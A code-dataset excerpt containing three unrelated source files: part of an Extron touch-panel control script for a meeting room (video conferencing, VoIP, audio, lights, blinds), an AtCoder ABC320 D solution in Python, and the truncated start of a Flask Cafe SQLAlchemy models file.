\"\"\"User Actions: Touch VC Page\"\"\"\n ## All the VC Dial Buttons pressed come in button variable\n if state == 'Pressed' or state == 'Repeated':\n print('Button Pressed - VC: %s' % button.Name)\n dialer_vc(button.Name) #Recall a validation function\n button.SetState(1)\n else:\n button.SetState(0)\n pass\n\n@event(BTNPAGE['VCOpt'], BTNSTATE['List'])\ndef vc_opt_events(button, state):\n \"\"\"User Actions: Touch VC Page\"\"\"\n\n ## VC Options: Content Control\n if button is BTN['VCEnviar'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['VC_PC'])\n BTN['VCEnviar'].SetState(1)\n print('Button Pressed - VC: %s' % 'Content')\n else:\n BTN['VCEnviar'].SetState(0)\n\n ## VC Options: Camera Control\n if button is BTN['VCCamara'] and state == 'Pressed':\n TLP.ShowPopup(POPUP['VC_Cam'])\n BTN['VCCamara'].SetState(1)\n print('Button Pressed - VC: %s' % 'Camera')\n else:\n BTN['VCCamara'].SetState(0)\n\n ## VC Options: AutoAnswer\n if button is BTN['VCAutoAn'] and state == 'Pressed':\n #\n if CISCO_DATA['AutoAnswer'] == True:\n CISCO.Set('AutoAnswer', 'Off')\n\n elif CISCO_DATA['AutoAnswer'] == False:\n CISCO.Set('AutoAnswer', 'On')\n print('Button Pressed - VC: %s' % 'AutoAnswer')\n pass\n\n## PAGE VC Content -------------------------------------------------------------\n@event(BTNPAGE['VCPC'], BTNSTATE['List'])\ndef vc_cam_content_sources(button, state):\n \"\"\"User Actions: Touch VC Content Page\"\"\"\n\n if button is BTN['VCHDMI'] and state == 'Pressed':\n ## HDMI to Cisco Computer Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'1', 'Output':'3', 'Tie Type':'Video'})\n print('Button Pressed - VC Share: %s' % 'HDMI')\n\n elif button is BTN['VCVGA'] and state == 'Pressed':\n ## VGA to Cisco Computer Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'2', 'Output':'3', 'Tie Type':'Video'})\n print('Button Pressed - VC Share: %s' % 'VGA')\n\n elif button is BTN['VCPTZ'] and state == 'Pressed':\n ## PTZ to Cisco Computer Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'3', 'Output':'3', 'Tie Type':'Video'})\n print('Button Pressed - VC Share: %s' % 'PTZ')\n\n elif button is BTN['VCShare'] and state == 'Pressed':\n ## ShareLink to Cisco Computer Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'4', 'Output':'3', 'Tie Type':'Video'})\n print('Button Pressed - VC Share: %s' % 'ClickShare')\n\n elif button is BTN['VCBack2'] and state == 'Pressed':\n ## Hide VC Content POPUP and Show the main VC POPUP\n TLP.ShowPopup(POPUP['VC'])\n print('Button Pressed - VC Share: %s' % 'Back')\n\n elif button is BTN['VCSend'] and state == 'Pressed':\n ## Play - Share graphics presentation\n CISCO.Set('Presentation', '1')\n print('Button Pressed - VC Share: %s' % 'Send')\n\n elif button is BTN['VCStop'] and state == 'Pressed':\n ## Stop - Sharing graphics\n CISCO.Set('Presentation', 'Stop')\n print('Button Pressed - VC Share: %s' % 'Stop')\n pass\n\n## PAGE VC Camera --------------------------------------------------------------\n@event(BTNPAGE['VCCam'], BTNSTATE['List'])\ndef vc_nav_events(button, state):\n \"\"\"User Actions: Touch VC Camera Page\"\"\"\n if button is BTN['VCUp']:\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraTiltSX20', 'Up', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Up')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Up')\n print('Cam Remota - Cisco: %s' % 'Cam Up')\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraTiltSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n #--\n elif button is BTN['VCLeft']:\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraPanSX20', 'Left', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Left')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Left')\n print('Cam Remota - Cisco: %s' % 'Cam Left')\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraPanSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n #--\n elif button is BTN['VCDown']:\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraTiltSX20', 'Down', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Down')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Down')\n print('Cam Remota - Cisco: %s' % 'Cam Down')\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraTiltSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n #--\n elif button is BTN['VCRight']:\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraPanSX20', 'Right', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Right')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Right')\n print('Cam Remota - Cisco: %s' % 'Cam Right')\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraPanSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraPan/Tilt', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n #--\n elif button is BTN['VCZoom1']: #+\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraZoomSX20', 'In', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Zoom+')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraZoom', 'In')\n print('Cam Remota - Cisco: %s' % 'Cam Zoom+')\n BTN['VCZoom1'].SetState(1)\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraZoomSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraZoom', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n BTN['VCZoom1'].SetState(0)\n #--\n elif button is BTN['VCZoom2']: #-\n if state == 'Pressed' or state == 'Repeated':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraZoomSX20', 'Out', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Zoom-')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraZoom', 'Out')\n print('Cam Remota - Cisco: %s' % 'Cam Zoom-')\n BTN['VCZoom2'].SetState(1)\n #--\n elif state == 'Released':\n if CISCO_DATA['Camera'] == 'Local':\n CISCO.Set('CameraZoomSX20', 'Stop', {'Speed':7})\n print('Cam Local - Cisco: %s' % 'Cam Stop')\n elif CISCO_DATA['Camera'] == 'Remote':\n CISCO.Set('FarEndCameraZoom', 'Stop')\n print('Cam Remota - Cisco: %s' % 'Cam Stop')\n BTN['VCZoom2'].SetState(0)\n #--\n if button is BTN['VCLocal'] and state == 'Pressed':\n CISCO_DATA['Camera'] = 'Local'\n BTNGROUP['VCCam'].SetCurrent(BTN['VCLocal'])\n print('Button Pressed - Cisco: %s' % 'Cam Local')\n #--\n elif button is BTN['VCRemote'] and state == 'Pressed':\n CISCO_DATA['Camera'] = 'Remote'\n BTNGROUP['VCCam'].SetCurrent(BTN['VCRemote'])\n print('Button Pressed - Cisco: %s' % 'Cam Remote')\n pass\n\n\n@event(BTNPAGE['VCPre'], BTNSTATE['List'])\ndef vc_cam_events(button, state):\n \"\"\"User Actions: Touch VC Camera Page\"\"\"\n if button is BTN['VCP1'] and state == 'Pressed':\n if CISCO_DATA['Camera'] == 'Local':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('CameraPresetPositionRecallSX20', '1')\n print('Recall Local Preset Cisco: %s' % '1')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('CameraPresetSaveSX20', '1')\n print('Save Local Preset Cisco: %s' % '1')\n #--\n elif CISCO_DATA['Camera'] == 'Remote':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('FarEndCameraPresetRecall', '1')\n print('Recall Remote Preset Cisco: %s' % '1')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('FarEndCameraPresetSave', '1')\n print('Save Remote Preset Cisco: %s' % '1')\n #--\n elif button is BTN['VCP2'] and state == 'Pressed':\n if CISCO_DATA['Camera'] == 'Local':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('CameraPresetPositionRecallSX20', '2')\n print('Recall Local Preset Cisco: %s' % '2')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('CameraPresetSaveSX20', '2')\n print('Save Local Preset Cisco: %s' % '2')\n #--\n elif CISCO_DATA['Camera'] == 'Remote':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('FarEndCameraPresetRecall', '2')\n print('Recall Remote Preset Cisco: %s' % '2')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('FarEndCameraPresetSave', '2')\n print('Save Remote Preset Cisco: %s' % '2')\n #--\n elif button is BTN['VCP3'] and state == 'Pressed':\n if CISCO_DATA['Camera'] == 'Local':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('CameraPresetPositionRecallSX20', '3')\n print('Recall Local Preset Cisco: %s' % '3')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('CameraPresetSaveSX20', '3')\n print('Save Local Preset Cisco: %s' % '3')\n #--\n elif CISCO_DATA['Camera'] == 'Remote':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('FarEndCameraPresetRecall', '3')\n print('Recall Remote Preset Cisco: %s' % '3')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('FarEndCameraPresetSave', '3')\n print('Save Remote Preset Cisco: %s' % '3')\n #--\n elif button is BTN['VCP4'] and state == 'Pressed':\n if CISCO_DATA['Camera'] == 'Local':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('CameraPresetPositionRecallSX20', '4')\n print('Recall Local Preset Cisco: %s' % '4')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('CameraPresetSaveSX20', '4')\n print('Save Local Preset Cisco: %s' % '4')\n #--\n elif CISCO_DATA['Camera'] == 'Remote':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('FarEndCameraPresetRecall', '4')\n print('Recall Remote Preset Cisco: %s' % '4')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('FarEndCameraPresetSave', '4')\n print('Save Remote Preset Cisco: %s' % '4')\n #--\n elif button is BTN['VCP5'] and state == 'Pressed':\n if CISCO_DATA['Camera'] == 'Local':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('CameraPresetPositionRecallSX20', '5')\n print('Recall Local Preset Cisco: %s' % '5')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('CameraPresetSaveSX20', '5')\n print('Save Local Preset Cisco: %s' % '5')\n #--\n elif CISCO_DATA['Camera'] == 'Remote':\n if CISCO_DATA['PresetMode'] == 'Recall':\n CISCO.Set('FarEndCameraPresetRecall', '5')\n print('Recall Remote Preset Cisco: %s' % '5')\n elif CISCO_DATA['PresetMode'] == 'Save':\n CISCO.Set('FarEndCameraPresetSave', '5')\n print('Save Remote Preset Cisco: %s' % '5')\n #--\n elif button is BTN['VCRecall'] and state == 'Pressed':\n CISCO_DATA['PresetMode'] = 'Recall'\n BTNGROUP['VCPTZ'].SetCurrent(BTN['VCRecall'])\n print('Button Pressed - Cisco: %s' % 'Recall')\n #--\n elif button is BTN['VCSave'] and state == 'Pressed':\n CISCO_DATA['PresetMode'] = 'Save'\n BTNGROUP['VCPTZ'].SetCurrent(BTN['VCSave'])\n print('Button Pressed - Cisco: %s' % 'Save')\n pass\n\n## PAGE Webex ------------------------------------------------------------------\n@event(BTNPAGE['Webex'], BTNSTATE['List'])\ndef webex_events(button, state):\n \"\"\"User Actions: Touch Webex Page\"\"\"\n if button is BTN['WHDMI'] and state == 'Pressed':\n ## HDMI to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'1', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'HDMI')\n\n elif button is BTN['WVGA'] and state == 'Pressed':\n ## VGA to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'2', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'VGA')\n\n elif button is BTN['WPTZ'] and state == 'Pressed':\n ## PTZ to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'3', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'PTZ')\n\n elif button is BTN['WShare'] and state == 'Pressed':\n ## ShareLink to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'4', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'ShareLink')\n\n elif button is BTN['WCisco1'] and state == 'Pressed':\n ## Cisco 1 to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'5', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'Cisco 1')\n\n elif button is BTN['WCisco2'] and state == 'Pressed':\n ## Cisco 2 to MediaPort200 Input - Video\n MATRIX.Set('MatrixTieCommand', None, {'Input':'6', 'Output':'5', 'Tie Type':'Video'})\n print('Button Pressed - Webex: %s' % 'Cisco 2')\n pass\n\n## PAGE VoIP -------------------------------------------------------------------\n@event(BTNPAGE['TelCall'], BTNSTATE['List'])\ndef vi_call_events(button, state):\n \"\"\"User Actions: Touch VoIP Page\"\"\"\n if button is BTN['Call'] and state == 'Pressed':\n ##--This button dial the number typed on the touch panel (Biamp VoIP)\n BIAMP.Set('VoIPHook', 'Dial',\n {'Instance Tag':'Dialer', 'Line':'1', 'Call Appearance':'1', \\\n 'Number':VOIP_DATA['Dial']})\n print('Button Pressed - VoIP: %s' % 'Call')\n #--\n elif button is BTN['Hangup'] and state == 'Pressed':\n ##--This button hangs up all active calls (Biamp VoIP)\n BIAMP.Set('VoIPHook', 'End',\n {'Instance Tag':'Dialer', 'Line':'1', 'Call Appearance':'1'})\n print('Button Pressed - VoIP: %s' % 'Hangup')\n pass\n\n## This function is called when the user press a Dial Button\n## This function add or remove data from the panel Dial Number\ndef dialer_voip(btn_name):\n \"\"\"User Actions: Touch VoIP Page\"\"\"\n global dialerVI\n\n if btn_name == 'Delete': #If the user push 'Delete' button\n dialerVI = dialerVI[:-1] #Remove the last char of the string\n VOIP_DATA['Dial'] = dialerVI #Asign the string to the data dictionary\n LBL['Dial'].SetText(dialerVI) #Send the string to GUI Label\n\n else: #If the user push a [*#0-9] button\n number = str(btn_name[4]) #Extract the valid character of BTN name\n if VOIP_DATA['DTMF'] == False: #If the DTMF is off\n dialerVI += number #Append the last char to the string\n VOIP_DATA['Dial'] = dialerVI #Asign the string to the data dictionary\n LBL['Dial'].SetText(dialerVI) #Send the string to GUI Label\n elif VOIP_DATA['DTMF'] == True: #If DTMF is On\n BIAMP.Set('DTMF', number, {'Instance Tag':'Dialer', 'Line':'1'})\n pass\n\n@event(BTNPAGE['TelDial'], BTNSTATE['List'])\ndef vi_dial_events(button, state):\n \"\"\"User Actions: Touch VoIP Page\"\"\"\n ## All the VoIP Dial Buttons pressed come in button variable\n if state == 'Pressed' or state == 'Repeated':\n print('Button Pressed - VoIP: %s' % button.Name)\n dialer_voip(button.Name) #Recall a validation function\n button.SetState(1)\n else:\n button.SetState(0)\n pass\n\n@event(BTNPAGE['TelOpt'], BTNSTATE['List'])\ndef vi_opt_events(button, state):\n \"\"\"User Actions: Touch VoIP Page\"\"\"\n ## VoIP Redial Control\n if button is BTN['Redial'] and state == 'Pressed':\n BIAMP.Set('VoIPHook', 'Redial', {'Instance Tag':'Dialer', \\\n 'Line':'1', 'Call Appearance':'1'})\n print('Button Pressed - VoIP: %s' % 'Redial')\n\n ## VoIP DTMF Control\n elif button is BTN['DTMF'] and state == 'Pressed':\n if VOIP_DATA['DTMF'] == False:\n VOIP_DATA['DTMF'] = True\n BTN['DTMF'].SetState(1)\n print('Button Pressed - VoIP: %s' % 'DTMF On')\n #--\n elif VOIP_DATA['DTMF'] == True:\n VOIP_DATA['DTMF'] = False\n BTN['DTMF'].SetState(0)\n print('Button Pressed - VoIP: %s' % 'DTMF Off')\n print('Button Pressed - VoIP: %s' % 'DTMF')\n\n ## Hold / Resume Control\n elif button is BTN['Hold'] and state == 'Pressed':\n print('Button Pressed - VoIP: %s' % 'Hold/Resume')\n pass\n\n## PAGE Audio ------------------------------------------------------------------\n@event(BTNPAGE['Audio1'], BTNSTATE['List'])\ndef audio_source_events(button, state):\n \"\"\"User Actions: Touch Audio Page\"\"\"\n\n if button is BTN['XHDMI'] and state == 'Pressed':\n ## HDMI to HDMI Audio Dembedder Input - Audio\n MATRIX.Set('MatrixTieCommand', None, {'Input':'1', 'Output':'1', 'Tie Type':'Audio'})\n print('Button Pressed - Audio: %s' % 'HDMI')\n\n elif button is BTN['XVGA'] and state == 'Pressed':\n ## VGA to HDMI Audio Dembedder Input - Audio\n MATRIX.Set('MatrixTieCommand', None, {'Input':'2', 'Output':'1', 'Tie Type':'Audio'})\n print('Button Pressed - Audio: %s' % 'VGA')\n\n elif button is BTN['XShare'] and state == 'Pressed':\n ## ShareLink to HDMI Audio Dembedder Input - Audio\n MATRIX.Set('MatrixTieCommand', None, {'Input':'4', 'Output':'1', 'Tie Type':'Audio'})\n print('Button Pressed - Audio: %s' % 'ShareLink')\n pass\n\n@event(BTNPAGE['Audio2'], BTNSTATE['List'])\ndef audio_vol_events(button, state):\n \"\"\"User Actions: Touch Audio Page\"\"\"\n\n ## Data of current Biamp Block Gain\n global CURRENTLVL1\n global CURRENTLVL2\n CURRENTLVL1 = BIAMP_DATA['lvl_spk']\n CURRENTLVL2 = CISCO_DATA['Volume']\n\n ## Audio Speaker: Vol -\n if button is BTN['XSpkLess']:\n if state == 'Pressed' or state == 'Repeated':\n CURRENTLVL1 -= 5 ## Decrease 5 dB\n if CURRENTLVL1 < -100:\n print('Biamp Minimun gain')\n else:\n BIAMP.Set('LevelControl', CURRENTLVL1, {'Instance Tag':'lvl_spk', 'Channel':'1'})\n LVL['Spk'].SetLevel(CURRENTLVL1)\n BTN['XSpkLess'].SetState(1)\n else:\n BTN['XSpkLess'].SetState(0)\n print('Button Pressed - Audio: %s' % 'Spk-')\n\n ## Audio Speaker: Vol +\n elif button is BTN['XSpkPlus']:\n if state == 'Pressed' or state == 'Repeated':\n CURRENTLVL1 += 5 ## Increase 5 dB\n if CURRENTLVL1 > 12:\n print('Biamp Maximun gain')\n else:\n BIAMP.Set('LevelControl', CURRENTLVL1, {'Instance Tag':'lvl_spk', 'Channel':'1'})\n LVL['Spk'].SetLevel(CURRENTLVL1)\n BTN['XSpkPlus'].SetState(1)\n else:\n BTN['XSpkPlus'].SetState(0)\n print('Button Pressed - Audio: %s' % 'Spk+')\n\n ## Audio VC Remote: Vol -\n if button is BTN['XVCLess']:\n if state == 'Pressed' or state == 'Repeated':\n CURRENTLVL2 -= 5 ## Decrease 5 dB\n if CURRENTLVL2 < 0:\n print('VC Minimun gain')\n else:\n CISCO.Set('Volume', CURRENTLVL2)\n LVL['VC'].SetLevel(CURRENTLVL2)\n BTN['XVCLess'].SetState(1)\n else:\n BTN['XVCLess'].SetState(0)\n print('Button Pressed - Audio: %s' % 'VC-')\n\n ## Audio VC Remote: Vol +\n if button is BTN['XVCPlus']:\n if state == 'Pressed' or state == 'Repeated':\n CURRENTLVL2 += 5 ## Increase 5 dB\n if CURRENTLVL2 < 0:\n print('VC Maximun gain')\n else:\n CISCO.Set('Volume', CURRENTLVL2)\n LVL['VC'].SetLevel(CURRENTLVL2)\n BTN['XVCPlus'].SetState(1)\n else:\n BTN['XVCPlus'].SetState(0)\n print('Button Pressed - Audio: %s' % 'VC+')\n pass\n\n@event(BTNPAGE['Audio3'], BTNSTATE['List'])\ndef audio_mute_events(button, state):\n \"\"\"User Actions: Touch Audio Page\"\"\"\n\n ## Mute Speaker Audio Control\n if button is BTN['XSpk'] and state == 'Pressed':\n if BIAMP_DATA['MuteSpk'] == True:\n BIAMP.Set('MuteControl', 'Off', {'Instance Tag':'lvl_spk', 'Channel':'1'})\n elif BIAMP_DATA['MuteSpk'] == False:\n BIAMP.Set('MuteControl', 'On', {'Instance Tag':'lvl_spk', 'Channel':'1'})\n print('Button Pressed - Audio: %s' % 'Mute Spk')\n\n ## Mute VC Remote Audio Control\n elif button is BTN['XVC'] and state == 'Pressed':\n if BIAMP_DATA['MuteVCRx'] == True:\n BIAMP.Set('MuteControl', 'Off', {'Instance Tag':'lvl_vcrx', 'Channel':'1'})\n elif BIAMP_DATA['MuteVCRx'] == False:\n BIAMP.Set('MuteControl', 'On', {'Instance Tag':'lvl_vcrx', 'Channel':'1'})\n print('Button Pressed - Audio: %s' % 'Mute VC')\n\n ## Mute All Mics Audio Control\n elif button is BTN['XMics'] and state == 'Pressed':\n if BIAMP_DATA['Mute_Mics'] == True:\n BIAMP.Set('MuteControl', 'Off', {'Instance Tag':'mute_mix', 'Channel':'1'})\n elif BIAMP_DATA['Mute_Mics'] == False:\n BIAMP.Set('MuteControl', 'On', {'Instance Tag':'mute_mix', 'Channel':'1'})\n print('Button Pressed - Audio: %s' % 'Mute Mics')\n pass\n\n## Lights PAGE -----------------------------------------------------------------\n@event(BTNPAGE['Lights'], BTNSTATE['List'])\ndef lights_events(button, state):\n \"\"\"User Actions: Touch Lights Page\"\"\"\n\n if button is BTN['Escene1'] and state == 'Pressed':\n ## All Lights Off\n LUTRON.Set('4ButtonPicoControls', 'Press', {'Integration ID':'2', 'Button':'4'})\n print('Button Pressed - Lights: %s' % 'Escene 1')\n\n elif button is BTN['Escene2'] and state == 'Pressed':\n ## Black soft Lights\n LUTRON.Set('4ButtonPicoControls', 'Press', {'Integration ID':'2', 'Button':'3/Lower'})\n print('Button Pressed - Lights: %s' % 'Escene 2')\n\n elif button is BTN['Escene3'] and state == 'Pressed':\n ## White soft Lights\n LUTRON.Set('4ButtonPicoControls', 'Press', {'Integration ID':'2', 'Button':'2/Raise'})\n print('Button Pressed - Lights: %s' % 'Escene 3')\n\n elif button is BTN['Escene4'] and state == 'Pressed':\n ## All Lights On\n LUTRON.Set('4ButtonPicoControls', 'Press', {'Integration ID':'2', 'Button':'1'})\n print('Button Pressed - Lights: %s' % 'Escene 4')\n\n ## Mutually Exclusive\n BTNGROUP['Lights'].SetCurrent(button)\n pass\n\n## Blinds PAGE -----------------------------------------------------------------\n@event(BTNPAGE['Blinds'], BTNSTATE['List'])\ndef lights_events(button, state):\n \"\"\"User Actions: Touch Blinds Page\"\"\"\n\n if button is BTN['BlindsUp'] and state == 'Pressed' or state == 'Repeated':\n ## Blinds Up\n #SOMFY.Set('Tilt', 'Up', {'Channel':'1', 'Amplitude':1})\n BTNGROUP['Blinds'].SetCurrent(button)\n print('Button Pressed - Lights: %s' % 'Blinds Up')\n\n elif button is BTN['BlindsSt'] and state == 'Pressed':\n ## Blinds Stop\n #SOMFY.Set('Position', 'Stop', {'Channel':'1'})\n BTNGROUP['Blinds'].SetCurrent(button)\n print('Button Pressed - Lights: %s' % 'Blinds Stop')\n\n elif button is BTN['BlindsDw'] and state == 'Pressed' or state == 'Repeated':\n ## Blinds Down\n #SOMFY.Set('Tilt', 'Down', {'Channel':'1', 'Amplitude':1})\n BTNGROUP['Blinds'].SetCurrent(button)\n print('Button Pressed - Lights: %s' % 'Blinds Down')\n \n ## Mutually Exclusive\n BTNGROUP['Blinds'].SetCurrent(button)\n pass\n\n## Status PAGE -----------------------------------------------------------------\n\n## Power PAGE ------------------------------------------------------------------\n@event(BTN['PowerAll'], BTNSTATE['List'])\ndef power_events(button, state):\n \"\"\"User Actions: Touch PowerOff Page\"\"\"\n\n global PWRCOUNT\n ## If the user press the Power Button:\n ## Only Turn On the first state of button - Does not do any action\n if state == 'Pressed':\n BTN['PowerAll'].SetState(4)\n print('Button Pressed: %s' % 'PowerAll')\n\n ## If the user holds down the button:\n ## A variable is Decremented from 4 to 0 seconds\n ## In each new value, Turn On each visual state of the Power Button\n ## Whne the value is equal to 0, ShutDown all devices in the System\n elif state == 'Repeated':\n PWRCOUNT = PWRCOUNT - 1\n BTN['PowerAll'].SetState(PWRCOUNT)\n LBL['CountAll'].SetText(str(PWRCOUNT))\n print('Button Repeated: %s' % 'PowerAll')\n ## SHUTDOWN ALL DEVICES\n if PWRCOUNT == 0:\n TLP.ShowPage(PAGE['Index'])\n\n ## If the user release the Button:\n ## Clean the counter power data in GUI and delete the visual feedback\n elif state == 'Released':\n PWRCOUNT = 4\n BTN['PowerAll'].SetState(0)\n LBL['CountAll'].SetText('')\n print('Button Released: %s' % 'PowerAll')\n pass\n\n## End Events Definitions-------------------------------------------------------\ninitialize()\n","repo_name":"dyanko14/ACT_HQ_MeetingRoom","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":60999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"25751998840","text":"import collections, math, bisect, heapq, random, functools, itertools, copy, typing\nimport platform; LOCAL = (platform.uname().node == 'AMO')\n\n\nimport sys; input = lambda: sys.stdin.readline().rstrip(\"\\r\\n\")\ninp = lambda f=int: list(map(f, input().split()))\n\ndef make_arr(*args):\n def func(x):\n if len(args) == 1: return [x() for _ in range(args[0])]\n return [make_arr(*args[1:])(x) for _ in range(args[0])]\n return func\n\ndef debug(*args):\n if LOCAL:\n print('\\033[92m', end='')\n printf(*args)\n print('\\033[0m', end='')\n\ndef printf(*args):\n if LOCAL:\n print('>>>: ', end='')\n for arg in args:\n if isinstance(arg, typing.Iterable) and \\\n not isinstance(arg, str) and \\\n not isinstance(arg, dict):\n print(' '.join(map(str, arg)), end=' ')\n else:\n print(arg, end=' ')\n print()\n\n# avaliable on Google, AtCoder\n# sys.setrecursionlimit(10**6)\n# import numpy as np\n# import scipy\n\n# d4 = [(1,0),(0,1),(-1,0),(0,-1)]\n# d8 = [(1,0),(1,1),(0,1),(-1,1),(-1,0),(-1,-1),(0,-1),(1,-1)]\n# d6 = [(2,0),(1,1),(-1,1),(-2,0),(-1,-1),(1,-1)] # hexagonal layout\n\ndef solve(cas):\n n, m = inp()\n G = [[] for _ in range(n+1)]\n for _ in range(m):\n a, b, x, y = inp()\n G[a].append((b, x, y))\n G[b].append((a, -x, -y))\n \n pos = [None] * (n+1)\n pos[1] = (0, 0)\n def bfs():\n q = collections.deque([1])\n while q:\n u = q.popleft()\n for v, x, y in G[u]:\n if pos[v] == None:\n pos[v] = (pos[u][0] + x, pos[u][1] + y)\n q.append(v)\n else:\n if pos[v] != 'undecidable':\n if pos[v][0] != pos[u][0] + x or pos[v][1] != pos[u][1] + y:\n pos[v] = 'undecidable'\n \n \n bfs()\n for i in range(1, n+1):\n if pos[i] is None:\n print('undecidable')\n else:\n printf(pos[i])\n \n\ncas = 1\nfor _ in range(cas):\n solve(_)\n\n","repo_name":"amomorning/online-challenges","sub_path":"atcoder/abc320/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"34804790504","text":"\"\"\"Data models for Flask Cafe\"\"\"\n\n\nfrom flask_bcrypt import Bcrypt\nfrom flask_sqlalchemy import SQLAlchemy\n\n\nbcrypt = Bcrypt()\ndb = SQLAlchemy()\n\nDEFAULT_IMG_URL = \"/static/images/default-pic.png\"\n\n\nclass User(db.Model):\n \"\"\"A user.\"\"\"\n\n __tablename__ = \"users\"\n\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n\n username = db.Column(db.String(25), nullable=False, unique=True)\n\n admin = db.Column(db.Boolean, nullable=False, default=False)\n\n email = db.Column(\n db.String(50),\n nullable=False,\n )\n\n first_name = db.Column(\n db.String(25),\n nullable=False,\n )\n\n last_name = db.Column(\n db.String(25),\n nullable=False,\n )\n\n description = db.Column(\n db.Text,\n nullable=False,\n )\n\n image_url = db.Column(\n db.Text,\n nullable=False,\n default=DEFAULT_IMG_URL,\n )\n\n password = db.Column(db.Text, nullable=False)\n\n def get_full_name(self):\n return f\"{self.first_name} {self.last_name}\"\n\n @classmethod\n def register(\n cls,\n username,\n 